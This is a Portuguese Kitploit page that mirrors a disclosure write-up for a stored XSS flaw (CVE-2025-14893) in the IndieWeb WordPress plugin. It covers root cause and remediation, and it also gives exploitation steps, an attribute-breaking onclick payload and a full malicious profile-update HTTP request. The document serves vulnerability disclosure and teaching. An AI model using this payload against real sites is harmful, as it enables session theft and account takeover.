Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-14893 — Cross-Site Scripting (XSS) Armazenado Autenticado no Plugin IndieWeb para WordPress | Kitploit
Ferramentas/GitHubGitHub/d3kc4rt1/cve-2025-14893
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoPapers e PesquisaAprendizado e Educação
GitHubd3kc4rt1/cve-2025-14893

CVE-2025-14893

Cross-Site Scripting (XSS) Armazenado Autenticado no Plugin IndieWeb para WordPress

Ver Repositório
1há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-14893: Cross-Site Scripting (XSS) Armazenado Autenticado no Plugin IndieWeb para WordPress

Aviso Legal: Este repositório foi criado apenas para fins educacionais e divulgação ética. A vulnerabilidade foi reportada de forma responsável ao fornecedor e corrigida. Não utilize estas informações para explorar sistemas sem a devida autorização.

Resumo Executivo

Uma vulnerabilidade de Cross-Site Scripting (XSS) Armazenado foi descoberta no plugin IndieWeb para WordPress (versões <= 4.0.5). Essa vulnerabilidade permite que atacantes autenticados com privilégios de Autor ou superiores injetem JavaScript malicioso no campo "Telefone" do perfil do usuário.

Quando o "Widget H-Card do Perfil do Autor" é exibido no front-end, o script injetado é renderizado sem sanitização adequada. Se um usuário altamente privilegiado, como um Administrador, clicar no link manipulado, o script será executado no contexto do navegador dele. Isso pode levar ao sequestro de sessão, ações administrativas não autorizadas e à completa Assunção de Conta (ATO).

Visão Geral da Vulnerabilidade

  • ID do CVE: CVE-2025-14893
  • Produto: IndieWeb (Plugin WordPress)
  • Versões Afetadas: <= 4.0.5
  • Cross-Site Scripting (XSS) Armazenado (CWE-79)
Tipo de Vulnerabilidade:
  • Privilégios Necessários: Autenticado (nível Autor ou superior)
  • Análise Técnica Aprofundada e Causa Raiz

    O problema central está no manuseio inseguro dos metadados do usuário no sistema de templates do plugin, especificamente na falha em usar as funções de escape integradas do WordPress.

    Arquivo Vulnerável: templates/h-card.php (Linha 27)

    root@kitploit:~
    <a class="p-tel tel" href="tel:<?php echo $user->get( 'tel' ); ?>"><?php echo $user->get( 'tel' ); ?></a>
    

    A Falha: O plugin produz diretamente os metadados tel do usuário dentro do atributo HTML href usando echo, sem envolvê-los em esc_attr(). Isso permite que um atacante forneça uma string manipulada que inclui uma aspa dupla (") para fechar prematuramente o atributo href, seguida por atributos HTML arbitrários (como style ou onclick).

    Impacto no Negócio

    • Account Takeover (ATO): Se um Administrador interagir com o elemento manipulado, o JavaScript do atacante pode roubar cookies de sessão ou executar requisições AJAX administrativas, concedendo ao atacante controle total sobre o site WordPress.
    • Dano à Reputação: O atacante pode modificar elementos visíveis da página (desfiguração) ou redirecionar visitantes legítimos para sites maliciosos de terceiros.

    Prova de Conceito (PoC)

    Pré-requisitos

    1. WordPress instalado com o IndieWeb <= 4.0.5 ativado.
    2. Uma conta de atacante com o papel de Autor.
    3. O "Widget H-Card do Perfil do Autor" adicionado a uma área visível do front-end (ex.: Barra Lateral).

    Etapas de Exploração

    1. Acesse o painel do WordPress como Autor.
    2. Navegue até Perfil (/wp-admin/profile.php).
    3. Role até o campo Telefone.
    4. Injete o seguinte payload (que rompe o atributo href):
      root@kitploit:~
      Click_Me" style="background:#ff4444; color:white; padding:5px; display:inline-block;" onclick="alert(document.cookie);
      
    5. Clique em Atualizar Perfil.
    6. Passo Crucial: Crie e publique um novo Post. O widget vulnerável só é renderizado em páginas de post único (is_single()) para exibir as informações do autor.
    7. Gatilho: Quando um Administrador visita o post publicado no front-end e clica no botão de telefone reformulado "Click_Me", o payload de XSS (que alerta o cookie da sessão) é executado.

    Exemplo de Requisição HTTP Maliciosa (Atualização de Perfil)

    root@kitploit:~
    POST /wp-admin/profile.php HTTP/1.1
    Host: TARGET
    Content-Type: application/x-www-form-urlencoded
    Cookie: [Author_Session_Cookies]
    
    _wpnonce=[valid_nonce]&_wp_http_referer=%2Fwp-admin%2Fprofile.php&from=profile&checkuser_id=2&color-nonce=[nonce]&admin_color=fresh&admin_bar_front=1&first_name=&last_name=&nickname=attacker&display_name=attacker&email=attacker%40example.com&tel=Click_Me"%20style%3D"background%3A%23ff4444%3B%20color%3Awhite%3B%20padding%3A5px%3B%20display%3Ainline-block%3B"%20onclick%3D"alert(document.cookie)%3B&action=update&user_id=2&submit=Update+Profile
    

    Remediação

    Para corrigir esta vulnerabilidade, os desenvolvedores do plugin devem escapar corretamente a saída usando as funções esc_attr() e esc_html() do WordPress.

    Exemplo de Código Corrigido:

    root@kitploit:~
    <a class="p-tel tel" href="tel:<?php echo esc_attr( $user->get( 'tel' ) ); ?>"><?php echo esc_html( $user->get( 'tel' ) ); ?></a>
    

    Linha do Tempo

    • Data (2026-03-03): Relatado ao Wordfence.
    • Data (2026-03-20): Vulnerabilidade corrigida / Divulgação pública.

    Referências e Créditos

    • Banco de Dados de Vulnerabilidades da Wordfence
    • CVE-2025-14893 no NVD
    • Plugin IndieWeb no WordPress.org
    Baixar ferramenta